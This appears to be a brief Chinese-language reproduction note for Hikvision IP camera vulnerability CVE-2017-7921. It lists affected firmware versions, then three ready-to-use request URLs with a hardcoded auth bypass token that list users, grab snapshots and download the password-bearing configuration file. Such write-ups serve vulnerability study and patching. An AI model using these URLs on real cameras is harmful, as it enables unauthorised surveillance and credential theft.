海康威視CVE-2017-7921
漏洞概述
通過構造url進行檢索所有用戶、屏幕截圖、配置文件下載
漏洞危害等級:中危
影響版本
-
HikvisionDS-2CD2xx2F-ISeries5.2.0build140721
-
版本至5.4.0build160530版本;
-
DS-2CD2xx0F-ISeries5.2.0build140721
-
版本至5.4.0Build160401版本;
-
DS-2CD2xx2FWDSeries5.3.1build150410
-
版本至5.4.4Build161125版本;
-
DS-2CD4x2xFWDSeries5.2.0build140721
-
版本至5.4.0Build160414版本;
-
DS-2CD4xx5Series5.2.0build140721
-
版本至5.4.0Build160421版本;
-
DS-2DFxSeries5.2.0build140805
-
版本至5.4.5Build160928版本;
-
DS-2CD63xxSeries5.0.9build140305
-
版本至5.3.5Build160106版本
基礎環境
| 組件 | 版本 |
|---|---|
| os | win7 |
| web | IE |
漏洞復現
url命令:
IP/Security/users?auth=YWRtaW46MTEK
檢索所有用戶及其角色的列表
IP/onvif-http/snapshot?auth=YWRtaW46MTEK
獲取相機快照而不進行身份驗證
IP/System/configurationFile?auth=YWRtaW46MTEK
下載攝像頭配置賬號密碼文件
得到二進制配置文件:configurationFile
configurationfile文件解碼器